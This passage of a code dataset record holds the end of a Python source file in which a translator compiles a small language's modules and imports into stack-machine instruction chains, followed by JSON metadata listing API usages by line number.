mcv[location]\n except KeyError:\n m = ___call___(location, [Module()])\n mcv[location] = m\n return m\n \n del mcv\n \"\"\"\n\n preamble = Chain()\n panic = Chain()\n\n d = self.declare_name(preamble, None, panic)\n d = AbsoluteFrameReference(0, 0, d.index)\n preamble.append_update(TRef(d), NewDict(), panic)\n\n self._blocks.push(BlockStack.FunctionBlock(0))\n imp_code = Chain()\n load1 = Chain()\n load2 = Chain()\n exit = Chain()\n l = self.declare_name(imp_code, None, panic)\n imp_code.append_push(CTerm(VDict.get), [Read(TRef(d)), Read(TRef(l))], load1)\n imp_code.append_pop()\n load1.append_push(Read(TRef(l)), [], exit)\n error = terms.Comparison(ComparisonOperator.NEQ, terms.Read(TRef(ExceptionReference())), terms.CNone())\n load1.append_guard({error: exit, negate(error): load2}, panic)\n load2.append_push(CTerm(VDict.set), [Read(TRef(d)), Read(TRef(l)), Read(TRef(ReturnValueReference()))], panic)\n load2.append_jump(exit)\n exit.append_pop()\n self._blocks.pop()\n\n self._import_procedure = VProcedure(1, imp_code.compile())\n\n return preamble\n\n def translate_module(self, nodes, dec):\n \"\"\"\n Generates code for an entire module.\n :param nodes: An iterable of statements that represent the code of the module.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A Chain object.\n \"\"\"\n\n # We assume that somebody put a fresh frame on the stack.\n\n block = Chain()\n entry = block\n exit = Chain()\n\n # We create a new Namespace object and put it into the stack frame.\n block.append_update(TRef(FrameReference(0)), terms.NewNamespace(), exit)\n\n # The code of a module assumes that there is 1 argument on the current stack frame, which is the Namespace object\n # that is to be populated. All allocations of local variables must actually be members of that Namespace object.\n self._blocks.push(BlockStack.ModuleBlock(0))\n\n # Import the builtin names:\n for bms in self._builtin:\n block = self.emit_import(block, bms, [], None, {s: s for s in bms.symbols}, exit)\n\n # We execute the module code completely, which populates that namespace.\n for node in nodes:\n block = self.translate_statement(block, node, dec, exit)\n\n # Return a Module object. 
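# The ___import___ helper sketched above is a once-only memoization: the
# cache maps a program location to the module produced by running its code,
# so any later import of the same location is a dictionary hit. A plain-Python
# equivalent of that behaviour; module loading is faked with a counter and
# all names here are illustrative:

_module_cache = {}
_load_count = 0

def import_once(location):
    global _load_count
    try:
        return _module_cache[location]   # fast path: already initialized
    except KeyError:
        _load_count += 1                 # the module code runs exactly once
        module = f"<module at {location}, load #{_load_count}>"
        _module_cache[location] = module
        return module

print(import_once("lib/a"))
print(import_once("lib/a"))  # same object, no second load
print(_load_count)           # 1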
The preamble will store it somewhere.\n block.append_update(TRef(ReturnValueReference()), terms.NewModule(terms.Read(TRef(FrameReference(0)))), exit)\n\n block.append_pop()\n exit.append_pop()\n\n self._blocks.pop()\n\n return entry\n\n def translate(self, nodes, dec):\n \"\"\"\n Translate a standalone program.\n :param nodes: An iterable of statements that represent the code of the main module.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A Chain object.\n \"\"\"\n self._blocks.push(BlockStack.ModuleBlock(0))\n code = self.emit_preamble() + self.translate_module(nodes, dec)\n self._blocks.pop()\n return code", "repo_name": "gfhcs/spektakelpy", "sub_path": "lang/spek/dynamic.py", "file_name": "dynamic.py", "file_ext": "py", "file_size_in_byte": 55489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "engine.functional.terms.UnaryOperation", "line_number": 22, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 22, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryOperator.NOT", "line_number": 22, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.UnaryOperator", "line_number": 22, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 54, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 58, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 89, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 89, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 91, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 120, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 132, "usage_type": "name"}, {"api_name": "engine.functional.terms.CBool", "line_number": 145, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 145, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 159, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 168, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 183, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 211, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 212, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 221, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 223, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 224, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 226, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 227, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 229, "usage_type": "call"}, {"api_name": "ast.Launch", "line_number": 230, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 232, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 239, "usage_type": "call"}, {"api_name": 
"engine.tasks.instructions.StackProgram", "line_number": 242, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 250, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 251, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 252, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 253, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 254, "usage_type": "call"}, {"api_name": "lang.translator.Translator", "line_number": 294, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 334, "usage_type": "argument"}, {"api_name": "ast.ProcedureDefinition", "line_number": 336, "usage_type": "argument"}, {"api_name": "ast.PropertyDefinition", "line_number": 338, "usage_type": "argument"}, {"api_name": "ast.ClassDefinition", "line_number": 340, "usage_type": "argument"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 354, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 360, "usage_type": "call"}, {"api_name": "engine.functional.reference.NameReference", "line_number": 361, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 362, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 362, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 362, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 380, "usage_type": "argument"}, {"api_name": "ast.Identifier", "line_number": 395, "usage_type": "argument"}, {"api_name": "ast.AssignableExpression", "line_number": 397, "usage_type": "argument"}, {"api_name": "ast.Identifier", "line_number": 423, "usage_type": "argument"}, {"api_name": "engine.functional.terms.TRef", "line_number": 427, "usage_type": "call"}, {"api_name": "ast.Tuple", "line_number": 429, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Project", "line_number": 433, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 433, "usage_type": "name"}, {"api_name": "engine.functional.terms.CInt", "line_number": 433, "usage_type": "call"}, {"api_name": "ast.Projection", "line_number": 434, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 435, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 438, "usage_type": "argument"}, {"api_name": "engine.functional.terms.StoreAttrCase", "line_number": 466, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 466, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 468, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 468, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 468, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 469, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 469, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 469, "usage_type": "attribute"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 484, "usage_type": "call"}, {"api_name": "ast.AssignableExpression", "line_number": 491, "usage_type": "argument"}, {"api_name": "util.check_type", "line_number": 514, "usage_type": "call"}, {"api_name": "modules.ModuleSpecification", "line_number": 514, 
"usage_type": "argument"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 518, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 519, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.ProgramLocation", "line_number": 519, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 521, "usage_type": "call"}, {"api_name": "engine.functional.terms.Lookup", "line_number": 524, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 524, "usage_type": "name"}, {"api_name": "engine.functional.terms.CString", "line_number": 524, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 527, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.Lookup", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.CString", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewTypeError", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 548, "usage_type": "name"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 550, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 550, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 550, "usage_type": "name"}, {"api_name": "engine.functional.terms.NumArgs", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms.CInt", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 556, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 556, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 556, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 560, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 561, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 561, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 561, "usage_type": "name"}, {"api_name": "ast.Constant", "line_number": 573, "usage_type": "argument"}, {"api_name": "engine.functional.terms.CBool", "line_number": 576, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 576, "usage_type": "name"}, {"api_name": "engine.functional.terms.CString", "line_number": 578, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 578, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", 
"line_number": 580, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 580, "usage_type": "name"}, {"api_name": "engine.functional.terms.CInt", "line_number": 582, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 582, "usage_type": "name"}, {"api_name": "engine.functional.terms.CFloat", "line_number": 584, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 584, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 588, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 589, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 589, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 590, "usage_type": "argument"}, {"api_name": "engine.functional.terms.LoadAttrCase", "line_number": 594, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 594, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 596, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 596, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 596, "usage_type": "attribute"}, {"api_name": "ast.Call", "line_number": 610, "usage_type": "argument"}, {"api_name": "ast.Launch", "line_number": 618, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 626, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 626, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 626, "usage_type": "call"}, {"api_name": "ast.Await", "line_number": 628, "usage_type": "argument"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 631, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 631, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 631, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 635, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 635, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 635, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 639, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 640, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 640, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 641, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 641, "usage_type": "name"}, {"api_name": "ast.Projection", "line_number": 643, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 646, "usage_type": "call"}, {"api_name": "ast.UnaryOperation", "line_number": 648, "usage_type": "argument"}, {"api_name": "engine.functional.terms.UnaryOperation", "line_number": 649, "usage_type": "call"}, {"api_name": "engine.functional.terms", 
"line_number": 649, "usage_type": "name"}, {"api_name": "ast.ArithmeticBinaryOperation", "line_number": 650, "usage_type": "argument"}, {"api_name": "engine.functional.terms.ArithmeticBinaryOperation", "line_number": 653, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 653, "usage_type": "name"}, {"api_name": "ast.Comparison", "line_number": 654, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 655, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 655, "usage_type": "name"}, {"api_name": "ast.BooleanBinaryOperation", "line_number": 658, "usage_type": "argument"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator.AND", "line_number": 669, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator", "line_number": 669, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 670, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 670, "usage_type": "name"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator.OR", "line_number": 671, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator", "line_number": 671, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 672, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 672, "usage_type": "name"}, {"api_name": "engine.functional.terms.CBool", "line_number": 674, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 674, "usage_type": "name"}, {"api_name": "engine.functional.terms.BooleanBinaryOperation", "line_number": 679, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 679, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 679, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 681, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 681, "usage_type": "name"}, {"api_name": "ast.Tuple", "line_number": 682, "usage_type": "argument"}, {"api_name": "engine.functional.terms.NewTuple", "line_number": 683, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 683, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 701, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 701, "usage_type": "call"}, {"api_name": "engine.functional.values.VReturnError", "line_number": 701, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 701, "usage_type": "name"}, {"api_name": "engine.functional.terms.TRef", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 708, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 727, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 727, "usage_type": "call"}, {"api_name": "engine.functional.values.VBreakError", "line_number": 727, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 727, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 731, "usage_type": 
"call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 731, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 731, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 752, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 752, "usage_type": "call"}, {"api_name": "engine.functional.values.VContinueError", "line_number": 752, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 752, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 756, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 756, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 756, "usage_type": "name"}, {"api_name": "engine.functional.terms.NewProcedure", "line_number": 802, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 802, "usage_type": "name"}, {"api_name": "ast.Pass", "line_number": 825, "usage_type": "argument"}, {"api_name": "ast.ExpressionStatement", "line_number": 827, "usage_type": "argument"}, {"api_name": "ast.Assignment", "line_number": 833, "usage_type": "argument"}, {"api_name": "ast.Block", "line_number": 836, "usage_type": "argument"}, {"api_name": "ast.Return", "line_number": 840, "usage_type": "argument"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 843, "usage_type": "call"}, {"api_name": "ast.Raise", "line_number": 846, "usage_type": "argument"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 852, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 852, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 852, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 859, "usage_type": "call"}, {"api_name": "ast.Break", "line_number": 862, "usage_type": "argument"}, {"api_name": "ast.Continue", "line_number": 865, "usage_type": "argument"}, {"api_name": "ast.Conditional", "line_number": 868, "usage_type": "argument"}, {"api_name": "ast.While", "line_number": 879, "usage_type": "argument"}, {"api_name": "ast.For", "line_number": 891, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 908, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 915, "usage_type": "call"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 918, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 920, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 920, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 920, "usage_type": "name"}, {"api_name": "ast.Try", "line_number": 929, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 942, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 942, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 942, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", 
"line_number": 943, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 943, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 943, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 949, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 949, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 961, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 961, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 961, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 962, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 962, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 970, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 970, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 970, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 971, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 971, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 971, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 972, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 972, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 972, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 973, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 973, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 973, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 977, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 977, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 977, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 978, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 978, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 978, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 979, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 979, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 984, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 984, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 984, "usage_type": "call"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 985, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 985, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 986, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 986, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 987, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 987, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", 
"line_number": 989, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 989, "usage_type": "name"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 990, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 990, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.IS", "line_number": 990, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 990, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 990, "usage_type": "attribute"}, {"api_name": "ast.VariableDeclaration", "line_number": 999, "usage_type": "argument"}, {"api_name": "ast.ProcedureDefinition", "line_number": 1004, "usage_type": "argument"}, {"api_name": "ast.PropertyDefinition", "line_number": 1012, "usage_type": "argument"}, {"api_name": "engine.functional.terms.NewProperty", "line_number": 1022, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1022, "usage_type": "name"}, {"api_name": "ast.ClassDefinition", "line_number": 1025, "usage_type": "argument"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1043, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewNamespace", "line_number": 1043, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1043, "usage_type": "name"}, {"api_name": "engine.functional.terms.NewClass", "line_number": 1047, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1047, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1047, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1047, "usage_type": "call"}, {"api_name": "ast.ImportNames", "line_number": 1054, "usage_type": "name"}, {"api_name": "ast.ImportSource", "line_number": 1054, "usage_type": "name"}, {"api_name": "util.check_type", "line_number": 1056, "usage_type": "call"}, {"api_name": "modules.ModuleSpecification", "line_number": 1056, "usage_type": "argument"}, {"api_name": "ast.ImportSource", "line_number": 1059, "usage_type": "argument"}, {"api_name": "ast.ImportNames", "line_number": 1067, "usage_type": "argument"}, {"api_name": "engine.functional.reference.AbsoluteFrameReference", "line_number": 1105, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1106, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewDict", "line_number": 1106, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.values.VDict.get", "line_number": 1114, "usage_type": "attribute"}, {"api_name": "engine.functional.values.VDict", "line_number": 1114, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 1116, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1116, "usage_type": "call"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1117, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.NEQ", "line_number": 1117, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", 
"line_number": 1117, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.values.VDict.set", "line_number": 1119, "usage_type": "attribute"}, {"api_name": "engine.functional.values.VDict", "line_number": 1119, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.values.VProcedure", "line_number": 1124, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewNamespace", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1143, "usage_type": "name"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewModule", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1158, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1158, "usage_type": "call"}]}
